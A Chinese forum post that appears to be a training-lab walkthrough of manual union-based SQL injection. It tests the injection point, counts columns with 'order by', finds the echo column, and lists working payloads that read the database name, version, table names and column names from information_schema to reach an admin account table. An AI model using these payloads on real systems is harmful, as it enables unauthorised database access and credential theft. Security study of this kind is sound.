一.判断注入点
1.输入 and 1=1 页面是否正常,要是正常,说明 and 这个参数注入进去被当成SQL语句
2.输入 and 1=2 页面不正常,初步判断这里可能存在一个注入漏洞
二.判断字段数
1.输入 order by 1 页面正常.进行第2步
2.输入 order by 2 页面正常.进行第3步
3.输入 order by 3 页面不正常.判断只有两个字段数
三.判断回显点
1.输入?id=3 union select 1,2 from admin 查看网页是否有回显.。 网页回显2,我们可以在数字2处,显示我们想要的内容
四.判断相关内容
1.查询当前数据库名称 ?id=3 union select 1,database() 网页回显maoshe
2.查询当前数据库版本 ?id=1 and 1=2 union select 1,version() 网页回显版本5.5.53
3.爆表名 发现有4个表 绝大多数情况下,管理员账号密码都在admin表里
这里是借鉴了detached的.不然过程就得写猜表名,猜字段 原贴地址https://bbs.zkaq.cn/t/3445.html
union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
4.爆字段名 回显了三个字段 username账号的意思,password密码的意思
这里是借鉴了detached的.不然过程就得写猜表名,猜字段 原贴地址https://bbs.zkaq.cn/t/3445.html
and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'#
5.知道了账号密码的字段名,可以进行最后一步了
5.1查询账号
5.2查询密码
原贴地址如下
detached 楼主的原贴 https://bbs.zkaq.cn/t/3445.html
解题思路地址
https://bbs.zkaq.cn/?t/2642.html
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
冰封小天堂
发表于 2019-4-21
不是id=1吗??为啥是id=3??
评论列表
加载数据中...